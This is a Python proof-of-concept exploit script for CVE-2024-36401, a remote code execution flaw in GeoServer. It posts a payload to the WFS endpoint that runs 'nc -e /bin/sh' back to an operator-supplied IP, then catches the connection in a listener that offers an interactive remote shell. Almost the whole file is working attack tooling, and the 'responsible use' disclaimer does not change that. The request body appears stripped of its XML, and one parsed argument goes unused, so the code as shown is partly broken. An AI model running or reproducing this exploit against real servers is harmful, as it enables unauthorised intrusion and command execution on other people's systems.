#!/usr/bin/python3 # -*- coding: utf-8 -*- """ Author: x.com/MohamedNab1l GitHub: https://github.com/bigb0x/CVE-2024-36401 About: POC for CVE-2024-36401: RCE for GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer. This POC is based on the security advisory by phith0n: https://github.com/vulhub/vulhub/tree/master/geoserver/CVE-2024-36401 Note: This POC will attempt to establish a reverse shell from the vlun targets. This is aimed to work against Linux targets. You will have to have a machine with published and accessiable IP in order to run this poc. This technique assumes that nc is available at the remote target. Usage: python CVE-2024-36401.py -u HTTP://TARGET:9090 -ip YOUR-IP -port LOCAL-PORT-NUMBER -type GeoServer-Object-Type Please feel free to contact me if you have any comments or sugesstions Version: 1.0.3 Refrences https://github.com/vulhub/vulhub/tree/master/geoserver/CVE-2024-36401 Disclaimer: I like to create my own tools for fun, work and educational purposes only. I do not support or encourage hacking or unauthorized access to any system or network. Please use my tools responsibly and only on systems where you have clear permission to test. """ import requests import argparse import re import os import threading import time import socket from urllib.parse import urlparse import select from urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) # ANSI color codes light_gray_color = '\033[37;1m' dimmed_gray_color = '\033[90m' honey_yellow_color = '\033[38;5;214m' dim_yellow_color = "\033[33;1m" cyan_color = '\033[96m' green_color = '\033[92m' red_color = '\033[31m' reset_color = '\033[0m' LOG_DIR = "logs" # THE_VERSION ="1.0.3" def banner(): print(f'''{honey_yellow_color} ┏┓┓┏┏┓ ┏┓┏┓┏┓┏┓ ┏┓┏┓┏┓┏┓┓ ┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┣┓┃┃┃┫┃ ┗┛┗┛┗┛ ┗━┗┛┗━┗╋ ┗┛┗┛┗╋┗┛┻ -> {light_gray_color}POC for CVE-2024-36401. Will try to obtain a shell on linux targets.{reset_color} {honey_yellow_color}-> {light_gray_color}By: x.com/mohamednab1l {honey_yellow_color}-> {honey_yellow_color}Use this wisely.{reset_color} ''') def print_message(level, message): current_time = time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime()) if level == 'info': print(f"{current_time} {green_color}[INFO]{reset_color} {message}") elif level == 'warning': print(f"{current_time} {honey_yellow_color}[VLUN] {message} {reset_color}") elif level == 'error': print(f"{current_time} {red_color}[ERROR]{message}{reset_color} ") def create_log_dir(): if not os.path.exists(LOG_DIR): os.makedirs(LOG_DIR) print_message('info', f"Log directory created: {LOG_DIR}") def clean_host(url): parsed_url = urlparse(url) host = parsed_url.netloc or parsed_url.path host = re.sub(r'^www\.', '', host) host = re.sub(r'/$', '', host) return host def send_poc_request(url, host, ip, port, type): full_url = f"{url}/geoserver/wfs" headers = { "Host": host, "Accept-Encoding": "gzip, deflate, br", "Accept": "*/*", "Accept-Language": "en-US;q=0.9,en;q=0.8", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36", "Connection": "close", "Cache-Control": "max-age=0", "Content-Type": "application/xml", } custom_payload = f""" exec(java.lang.Runtime.getRuntime(),'nc -e /bin/sh {ip} {port}') """ try: response = requests.post(full_url, headers=headers, data=custom_payload, timeout=30, verify=False) print_message('info', f"Response status code: {dim_yellow_color}{response.status_code}{reset_color}") if response.status_code in [401, 404, 403]: print_message('info', "Target is not vulnerable.") exit() else: print_message('info', "Request sent. Checking for incoming connections.") except requests.exceptions.RequestException as e: print_message('error', f"An error occurred: {e}") print_message('error', "Failed to send request!") def receive_output(client_socket, timeout=5): total_data = [] client_socket.setblocking(0) start_time = time.time() while True: if total_data and time.time() - start_time > timeout: break elif time.time() - start_time > timeout * 2: break try: data = client_socket.recv(8192) if data: total_data.append(data.decode('utf-8', errors='ignore')) start_time = time.time() else: time.sleep(0.1) except socket.error: pass return ''.join(total_data).strip() def interactive_shell(client_socket): print_message('warning', "Nice!, we got a remote shell! :)") client_socket.send(b"id\n") time.sleep(1) output = receive_output(client_socket) if output: print_message('warning', "Checking the output of 'id' command:") print(f"{output}") else: print("No output received from 'id' command.") print_message('warning', "Shell established!.") print_message('warning', "Type commands and press enter to send, or type 'exit' to end the session.") while True: try: command = input(f"{honey_yellow_color}shell> {reset_color}") if command.lower() == 'exit': break client_socket.send(command.encode() + b'\n') time.sleep(1) output = receive_output(client_socket) if output: print(output) else: print_message('warning', "No output received.") except Exception as e: print_message('error', f"Error in shell: {e}") break client_socket.close() print_message('info', "Shell connection closed.") exit() def listen(ip, port, stop_event): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind((ip, port)) s.settimeout(1) s.listen(1) print_message('info', f"Listening on {ip}:{port}...") try: while not stop_event.is_set(): try: client, (client_ip, client_port) = s.accept() print_message('info', f"Received connection from: {client_ip}:{client_port}") print_message('warning', "POC was successful!") interactive_shell(client) except socket.timeout: continue except Exception as e: print_message('error', f"An error occurred: {e}") finally: s.close() def main(): banner() parser = argparse.ArgumentParser(description='POC for CVE-2024-36401') parser.add_argument('-u', required=True, help='Target, example https://target:8080') parser.add_argument('-ip', required=True, help='Your IP, example 192.168.1.1') parser.add_argument('-port', required=True, help='Port, example 1337') parser.add_argument('-type', required=True, help='Type, example sf:archsites') args = parser.parse_args() url = args.u ip = args.ip port = int(args.port) type = args.type host = clean_host(url) stop_event = threading.Event() def listen_wrapper(): listen(ip, port, stop_event) listen_thread = threading.Thread(target=listen_wrapper) listen_thread.daemon = True listen_thread.start() time.sleep(1) try: # Send the POST request send_poc_request(url, host, ip, port, type) while listen_thread.is_alive(): listen_thread.join(1) except KeyboardInterrupt: print_message('info', "Keyboard interrupt received. Cleaning up...") finally: stop_event.set() # (should be quick now) listen_thread.join(timeout=5) if listen_thread.is_alive(): print_message('warning', "Listen thread did not stop in time. It will be terminated.") print_message('info', "Script execution completed. Exiting...") if __name__ == "__main__": create_log_dir() main()